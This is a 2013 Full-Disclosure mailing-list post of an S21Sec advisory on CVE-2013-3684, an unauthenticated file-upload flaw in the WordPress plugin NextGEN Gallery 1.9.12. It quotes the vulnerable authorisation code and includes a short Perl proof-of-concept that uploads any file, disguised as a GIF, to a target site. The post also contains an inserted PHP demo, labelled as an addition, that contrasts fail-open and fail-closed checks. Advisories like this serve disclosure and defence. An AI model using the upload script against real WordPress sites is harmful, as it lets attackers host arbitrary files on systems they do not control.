[Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload
- To: Full-Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload
- From: Marcos Agüero <maguero@xxxxxxxxxx>
- Date: Wed, 12 Jun 2013 16:51:29 +0200
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<tt>##############################################################<br>
<br>
<br>
- S21Sec Advisory -<br>
<br>
<br>
##############################################################<br>
<br>
Title: NextGEN Gallery 1.9.12 Arbitrary File Upload<br>
ID: S21SEC-046-en<br>
CVE ID: CVE-2013-3684<br>
Severity: High<br>
Status: Fixed<br>
History: 27.May.2013 Vulnerability discovered<br>
28.May.2013 Vendor informed<br>
12.Jun.2013 Fix released<br>
Authors: Marcos Agüero (<a
class="moz-txt-link-abbreviated"
href="mailto:maguero@xxxxxxxxxx">maguero@xxxxxxxxxx</a>)<br>
URL:
<a class="moz-txt-link-freetext"
href="http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt">http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt</a><br>
Release: Public<br>
<br>
<br>
[ SUMMARY ]<br>
<br>
NextGEN Gallery is a WordPress gallery plugin that offers sophisticated gallery management and displays. It's one of the most popular plugins ever produced for WordPress, currently downloaded around 30,000 times per week.<br>
<br>
[ AFFECTED VERSIONS ]<br>
<br>
* NextGEN Gallery 1.9.12<br>
<br>
[ DESCRIPTION ]<br>
<br>
NextGEN Gallery allows file uploads by unauthenticated users. The filters in place only permit uploads of image files (extensions .gif, .png and .jpg). This prevents script execution, but an attacker could still use the affected system to host arbitrary files.<br>
<br>
The vulnerability is caused by inappropriate auth cookie validation in the admin/upload.php script: the user and capability checks only run when a valid cookie is present, so a request with no auth cookie skips them entirely and continues to the upload code:<br>
<br>
<pre>
if (wp_validate_auth_cookie()) {
    $results   = wp_parse_auth_cookie();
    $logged_in = FALSE;
    if (isset($results['username']) && isset($results['expiration'])) {
        if (time() < floatval($results['expiration'])) {
            if (($userdata = get_userdatabylogin($results['username'])))
                $logged_in = $userdata->ID;
        }
    }

    if (!$logged_in) die("Login failure. -1");
    else if (!user_can($logged_in, 'NextGEN Upload images')) {
        die('You do not have permission to upload files. -2');
    }
} # VULN: No auth cookie is okay!
</pre>
<br>
This can be triggered by passing the 'nggupload' parameter on any valid WordPress URL, because the plugin hooks its upload handler into the WordPress 'init' action, which runs on every request:<br>
<br>
ngggallery.php:<br>
<br>
<pre>
// Handle upload requests
add_action('init', array(&$this, 'handle_upload_request'));

[...]
function handle_upload_request()
{
    if (isset($_GET['nggupload'])) {
        require_once(implode(DIRECTORY_SEPARATOR, array(
            NGGALLERY_ABSPATH,
            'admin',
            'upload.php'
        )));
        throw new E_Clean_Exit();
    }
}
</pre>
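The following is an added example, not code from the advisory, from NextGEN Gallery or from the vendor's 1.9.13 fix. It rewrites the authorisation logic of admin/upload.php as two functions, one structured like the fail-open snippet quoted above and one that fails closed on every path that does not end in an authorised user, and drives both with stubbed WordPress functions (wp_validate_auth_cookie, wp_parse_auth_cookie, get_userdatabylogin, user_can) whose behaviour is approximated for the demo. The function names authorize_upload_vulnerable and authorize_upload_fixed, the $state array and the scenario table are assumptions made here.<br>
<br>
```php
<?php
// Added illustration (not the plugin's or the vendor's code): the upload
// authorisation check as a fail-open and a fail-closed function, driven by
// stubbed WordPress functions so it runs stand-alone with the php CLI.
// All names below are assumptions made for this demo.

// --- Stubbed WordPress API (assumption: behaviour approximated) ---
$state = [];

function wp_validate_auth_cookie() {
    global $state;
    return $state['cookie_valid'];           // real WP: false when no cookie
}

function wp_parse_auth_cookie() {
    global $state;
    if (!$state['cookie_valid']) return false;   // real WP: false without a cookie
    return ['username' => $state['username'], 'expiration' => $state['expiration']];
}

function get_userdatabylogin($login) {
    global $state;
    if ($login !== $state['username'] || $state['user_id'] === 0) return false;
    return (object) ['ID' => $state['user_id']];
}

function user_can($user_id, $cap) {
    global $state;
    return $user_id === $state['user_id'] && $state['has_cap'];
}

// --- Fail-open check, structured like the 1.9.12 snippet ---
// Returns 'allowed' or the message the original would die() with.
function authorize_upload_vulnerable() {
    if (wp_validate_auth_cookie()) {
        $results   = wp_parse_auth_cookie();
        $logged_in = FALSE;
        if (isset($results['username']) && isset($results['expiration'])) {
            if (time() < floatval($results['expiration'])) {
                if (($userdata = get_userdatabylogin($results['username'])))
                    $logged_in = $userdata->ID;
            }
        }
        if (!$logged_in) return 'Login failure. -1';
        else if (!user_can($logged_in, 'NextGEN Upload images')) {
            return 'You do not have permission to upload files. -2';
        }
    }
    // No cookie or an invalid one: execution simply continues to the upload.
    return 'allowed';
}

// --- Fail-closed check: deny unless every step positively succeeds ---
function authorize_upload_fixed() {
    if (!wp_validate_auth_cookie()) {
        return 'Login failure. -1';          // no cookie or bad signature
    }
    $results = wp_parse_auth_cookie();
    if (!isset($results['username'], $results['expiration'])
        || time() >= floatval($results['expiration'])) {
        return 'Login failure. -1';          // malformed or expired cookie
    }
    $userdata = get_userdatabylogin($results['username']);
    if (!$userdata || empty($userdata->ID)) {
        return 'Login failure. -1';          // unknown user
    }
    if (!user_can($userdata->ID, 'NextGEN Upload images')) {
        return 'You do not have permission to upload files. -2';
    }
    return 'allowed';
}

// --- Constructed scenarios ---
$defaults  = ['cookie_valid' => false, 'username' => null, 'expiration' => 0,
              'user_id' => 0, 'has_cap' => false];
$loggedIn  = ['cookie_valid' => true, 'username' => 'alice',
              'expiration' => time() + 3600, 'user_id' => 7];
$scenarios = [
    'no auth cookie'               => [],
    'valid cookie, no capability'  => $loggedIn,
    'valid cookie, has capability' => $loggedIn + ['has_cap' => true],
    'valid cookie, expired'        => ['expiration' => time() - 1] + $loggedIn + ['has_cap' => true],
];
foreach ($scenarios as $label => $s) {
    $state = array_merge($defaults, $s);
    printf("%-30s vulnerable: %-42s fixed: %s\n",
           $label, authorize_upload_vulnerable(), authorize_upload_fixed());
}
```
<br>
Run with <tt>php demo.php</tt>: only the fail-open version reports 'allowed' for the "no auth cookie" row, while both agree on every row that carries a cookie. The design point is that the fixed version never reaches the upload code by falling through; each condition either proves an authorised user or returns a denial.<br>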
<br>
[ POC ]<br>
<br>
<pre>
#!/usr/bin/perl
use LWP;
use HTTP::Request::Common;

# Usage: poc.pl <url-with-?nggupload> <local-file>
my ($url, $file) = @ARGV;

my $ua  = LWP::UserAgent->new();
my $req = POST $url,
    Content_Type => 'form-data',
    Content      => [
        name          => $name,      # not set anywhere in this script; sent empty
        galleryselect => 1,          # Gallery ID, should exist
        Filedata      => [ "$file", "file.gif", Content_Type => 'image/gif' ]
    ];
my $res = $ua->request( $req );
if ( $res->is_success ) {
    print $res->content;
} else {
    print $res->status_line, "\n";
}
</pre>
<br>
[ SOLUTION ]<br>
<br>
Fixed in version 1.9.13, released by the vendor:
<a class="moz-txt-link-freetext"
href="http://wordpress.org/plugins/nextgen-gallery/">http://wordpress.org/plugins/nextgen-gallery/</a><br>
<br>
[ REFERENCES ]<br>
<br>
* S21Sec<br>
<a class="moz-txt-link-freetext"
href="http://www.s21sec.com">http://www.s21sec.com</a><br>
<br>
</tt>
<div class="moz-signature">-- <br>
<div class="moz-signature">
<style>
.Estilo1 {font-size: 11px}
.Estilo2 {font-size: 12px}
</style>
<div class="Section1">
<p class="MsoNormal"><b><span style="font-size:
10pt;font-family: Verdana;" lang="es-ES">Marcos
Agüero</span></b>
<span style="font-size: 11px; font-family: Verdana;"
lang="EN-GB"><br>
<em style="font-family: Verdana; color: rgb(221, 72, 20);">S21sec
ACSS</em> </span> <br>
<br>
<span style="font-size: 11px; font-family: Verdana;"> Tlf:
+34 902 222 521<br>
<br>
<a href="http://www.s21sec.com"
style="color:#dd4814">www.s21sec.com</a>,
<a href="http://blog.s21sec.com"
style="color:#dd4814">blog.s21sec.com</a>
<a href="http://securityblog.s21sec.com"
style="color:#dd4814">securityblog.s21sec.com</a> </span>
<br>
<br>
</p>
<p class="MsoNormal"><span style="font-size: 7.5pt;
font-family:Verdana; width:95%"> Unless otherwise indicated, this information is
CONFIDENTIAL and contains personal data that shall be
processed according to the personal data protection law in
force. If you are not the named addressee of this message
you are hereby notified that any review, dissemination,
distribution, copying or printing of this message is
strictly prohibited and we urge you to delete it from your
systems. <br>
<br>
<font color="#0B610B"> Before printing this message, consider whether
it is really necessary. In this way we help preserve the environment.
</font></span><font color="#0B610B"> </font> </p>
</div>
<font color="#0B610B"> </font></div>
</div>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/